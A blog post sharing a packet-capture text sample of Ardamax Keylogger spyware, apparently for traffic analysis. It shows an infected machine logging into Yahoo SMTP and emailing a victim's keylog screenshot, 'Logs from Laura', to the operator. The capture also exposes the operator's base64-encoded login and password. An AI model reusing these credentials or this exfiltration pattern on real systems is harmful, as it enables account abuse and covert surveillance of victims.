Ardamax Keylogger Key Stroke Logger Spyware Software PCAP Malware Traffic Sample

By | June 20, 2015

2013-02-03 18:21:34.765332 IP 172.16.253.129.53 > 8.8.8.8.53: 27825+ A? smtp.mail.yahoo.com. (37)
E..A……………..5.5.-..l…………smtp.mail.yahoo.com…..
2013-02-03 18:21:34.765388 IP 172.16.253.129.53 > 4.2.2.2.53: 27825+ A? smtp.mail.yahoo.com. (37)
E..A. ……………5.5.-..l…………smtp.mail.yahoo.com…..
2013-02-03 18:21:34.787972 IP 4.2.2.2.53 > 172.16.253.129.53: 27825 5/0/0 CNAME smtp.mail.global.gm0.yahoodns.net., CNAME smtp.mail.us.am0.yahoodns.net., A 63.250.193.228, A 98.138.105.21, A 98.139.211.125 (163)
E…R…..8……….5.5….l…………smtp.mail.yahoo.com…………….#.smtp.mail.global.gm0.yahoodns.net..1………..smtp.mail.us.am0.F.`……….?….`……….b.i..`……….b..}
2013-02-03 18:21:34.812374 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [S], seq 751532671, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.”@…O5….?……K,.z…..p…/………..
2013-02-03 18:21:34.901013 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [S.], seq 1778504586, ack 751532672, win 64240, options [mss 1460], length 0
E..,R…..<.?……..K..j…,.z.`………….
2013-02-03 18:21:34.901083 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [.], ack 1, win 64240, length 0
E..(.#@…O<….?……K,.z.j…P….<..
2013-02-03 18:21:34.988497 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 1:38, ack 1, win 64240, length 37
E..MR…..<.?……..K..j…,.z.P…|…220 smtp.mail.yahoo.com ESMTP ready

2013-02-03 18:21:34.988524 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 1:14, ack 38, win 64203, length 13
E..5.$@…O…..?……K,.z.j…P…|…EHLO DELLXT

2013-02-03 18:21:34.989514 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 14, win 64240, length 0
E..(R…..<.?……..K..j…,.z.P….
……..
2013-02-03 18:21:35.076405 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 38:145, ack 14, win 64240, length 107
E…R…..<_?……..K..j…,.z.P…….250-smtp.mail.yahoo.com
250-PIPELINING
250-SIZE 41697280
250-8 BITMIME
250 AUTH PLAIN LOGIN XYMCOOKIE

2013-02-03 18:21:35.076522 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 14:26, ack 145, win 64096, length 12
E..4.%@…O…..?……K,.z.j…P..`….AUTH LOGIN

2013-02-03 18:21:35.076786 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 26, win 64240, length 0
E..(R…..<.?……..K..j…,.z.P………….
2013-02-03 18:21:35.163894 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 145:163, ack 26, win 64240, length 18
E..:R…..<.?……..K..j…,.z.P…….334 VXNlcm5hbWU6

2013-02-03 18:21:35.164705 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 26:56, ack 163, win 64078, length 30
E..F.&@…O…..?……K,.z.j..-P..NZ…bGludXgwNjQwMEB5YWhvby5jb20=

2013-02-03 18:21:35.165967 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 56, win 64240, length 0
E..(R…..<.?……..K..j..-,.z.P….c……..
2013-02-03 18:21:35.251764 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 163:181, ack 56, win 64240, length 18
E..:R…..<.?……..K..j..-,.z.P…….334 UGFzc3dvcmQ6

2013-02-03 18:21:35.251896 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 56:70, ack 181, win 64060, length 14
E..6.’@…O*….?……K,.z.j..?P..<….YXplcnR5LzA2

2013-02-03 18:21:35.252053 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 70, win 64240, length 0
E..(R…..<.?……..K..j..?,.z.P….C……..
2013-02-03 18:21:35.578649 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 181:195, ack 70, win 64240, length 14
E..6R…..<.?……..K..j..?,.z.P…….235 2.0.0 OK

2013-02-03 18:21:35.578775 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 70:105, ack 195, win 64046, length 35
E..K.(@…O…..?……K,.z.j..MP…….MAIL FROM: <linux06400@yahoo.com>

2013-02-03 18:21:35.578955 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 105, win 64240, length 0
E..(R…..<.?……..K..j..M,.z.P………….
2013-02-03 18:21:35.667756 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 195:215, ack 105, win 64240, length 20
E..<R…..<.?……..K..j..M,.z.P…s ..250 OK , completed

2013-02-03 18:21:35.667874 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 105:138, ack 215, win 64026, length 33
E..I.)@…O…..?……K,.z.j..aP…:…RCPT TO: <linux06400@yahoo.com>

2013-02-03 18:21:35.668021 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 138, win 64240, length 0
E..(R…..<.?……..K..j..a,.{ P………….
2013-02-03 18:21:35.754885 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 215:235, ack 138, win 64240, length 20
E..<R…..<.?……..K..j..a,.{ P…r…250 OK , completed

2013-02-03 18:21:35.754988 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 138:144, ack 235, win 64006, length 6
E….*@…O/….?……K,.{ j..uP…x…DATA

2013-02-03 18:21:35.755090 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 144, win 64240, length 0
E..(R…..<.?……..K..j..u,.{.P………….
2013-02-03 18:21:35.843198 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 235:271, ack 144, win 64240, length 36
E..LR…..<.?……..K..j..u,.{.P…….354 Start Mail. End with CRLF.CRLF
2013-02-03 18:21:38.775967 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 144:1168, ack 271, win 63970, length 1024
E..(.,@…K3….?……K,.{.j…P…….From: <linux06400@yahoo.com>
To: <linux06400@yahoo.com>
Subject: Logs from “Laura”
Date: Thu, 6 Jun 2013 9:46:41 –0400
Importance: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2527
X-MSMail-Priority: Normal
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”————=000EE933″

This is a multipart message in MIME format

————–=000EE933
Content-Type: text/plain;
charset=”iso-8859-1″
Content-Transfer-Encoding: 7bit

You will find log file attached to this letter.
————–=000EE933
Content-Type: image/jpeg;
name=”Jun_06_2013__09_46_12.jpg”
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=”Jun_06_2013__09_46_12.jpg”

/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsK
CwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAN6BKQDASIA
AhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/
2013-02-03 18:21:38.776070 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 1168:2628, ack 271, win 63970, length 1460
E….-@…I~….?……K,…j…P…….8QAtRAAAgEDAwIEAwUFBAQA
AAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3
ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWm
p6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEA
AwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSEx
BhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElK
U1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3
uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD7IYNu
AGMHvSncejdKQN36EfrTlzuAJGTzxXtn65YcDgAsN1RmVAwBdVbPO44Ap+SMnI2ivV/Ds1t/wi9p
cZjitUtw0jNgKoC/MT+pNRN8sbnzmb5pPLeTkhzc1/wOZg+HF2Eae9njtYY8s4X5vlAyT/OuR8dW
k3hTWIIIpBNZ3MCyxORyTkhueh7du9d749+I/hTwb4Uv7zUr+NdPWH999llJyrcBV2H7zZwAOeQe
nNeWeCf2rPCHjvx1ofhSDwrqthqO6VY31iFEa3iWB5iw+ZmyfLUY/wBrOeMHwqGNhhcXB4qbbeij
0d9tvPufA5lxFVSVJ1uScrWI7HV5l8RXmjXUDRXMNtFdjcMEpIWABHrlD+BFa6thtuTn0rBuL1dX
+NXji7XJS2jsrRSScD9wsuB/397etbrJk5bDD9a+gcuZt2sfpeUzqVcFTnVd21uDHaVBPJ7elKvG
SBjHrTc7RyCfRKVmLEIBtz2oPVH5z1UdM0jMoJYDqMUjqM5Oc4xQRkYoAzPFOo3GlaOJ7PyhP50E
KmZCyDzJUQkgEE4DE9R0r43b/gpp4TbH+g6yPpokX/yfX1/42bOhKP8Ap9s//SmKofBH7Dnwp8S+
C9A1e68P6fHc6hp9vdyrDoelBA7xqzBQbQnGScZJ+tb4evhKMpfW4OW1rO3qfG5zicRRrxjRnZWP
kc/8FNfCZ62Osn/uCRf/ACfXdeB/2xrn4jafYX3h3wtrOo2t/qUmj27/ANnWcW+6S2a5aPD6mpGI
UZtxwvGM54r1zxP+zd+zx4aeeFbPStVvbYyfabSxsNBEluEIV/MMkCKpDMq7Cd5J4U4bGn4D/ZH/

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *